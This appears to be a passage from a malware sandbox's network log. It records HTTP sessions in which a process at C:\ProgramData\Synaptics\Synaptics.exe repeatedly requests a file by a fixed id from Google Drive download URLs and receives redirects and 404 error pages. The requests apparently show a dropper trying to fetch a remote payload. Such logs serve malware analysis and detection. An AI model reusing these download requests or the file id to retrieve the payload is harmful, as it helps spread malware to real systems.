                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        63192.168.2.549846142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:38 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IFyxi3uT8UyWel7UTD9eSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        64192.168.2.549850142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:38 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4xjACCzHWQkpTnzF4IdBeJWsbwQ8Wt4lz6MUoOTPLpvjzfwRJ9EWn_41ql3JpGIsvDEYJk17A
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:38 GMT
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-E2vbfZLdLrHL0K0ASADqig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:38 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:38 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 59 79 6d 78 38 5f 6e 68 52 59 41 39 61 34 77 75 41 45 64 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="wYymx8_nhRYA9a4wuAEdsA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:38 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        65192.168.2.549849142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5MBK4o0TL8mdsA9J_jz_jBMxJf5q5LcYOKlflX-LyYD2qvXCQEKPOnO5abtACBsHcD
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:38 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MW0amh_X7GCwXdQ2VnB8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 36 47 5f 49 63 63 6e 54 49 76 31 47 4e 75 4f 4b 46 64 41 2d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="K6G_IccnTIv1GNuOKFdA-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        66192.168.2.549861142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:39 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7G5lKBMeXpAb5cyR9_o3-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        67192.168.2.549863142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:39 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_S933YDnCjqmL6qQj4WS4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        68192.168.2.549864142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC6gV8BCzfGuYQhN2yQ05qyRfLlKtyL6XvkoLqYy93hb7MqCKY0TvNVdZgM37-M3sCTF
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:39 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hIn7nv2L5sbpFkff6ZyNjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 79 73 4b 41 4d 64 50 6a 45 77 4d 30 71 5a 61 52 5f 64 6d 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="BysKAMdPjEwM0qZaR_dmiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        69192.168.2.549865142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC58Y-WbYDfyGcg6wNq57iZrlxztHUeya1O6ZVbIzyhqI7l-uSMtHQVLwmgRjhfZ8QPdB0YN0GE
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:40 GMT
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BgGfeNyE0wB1fa_h8G_ofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
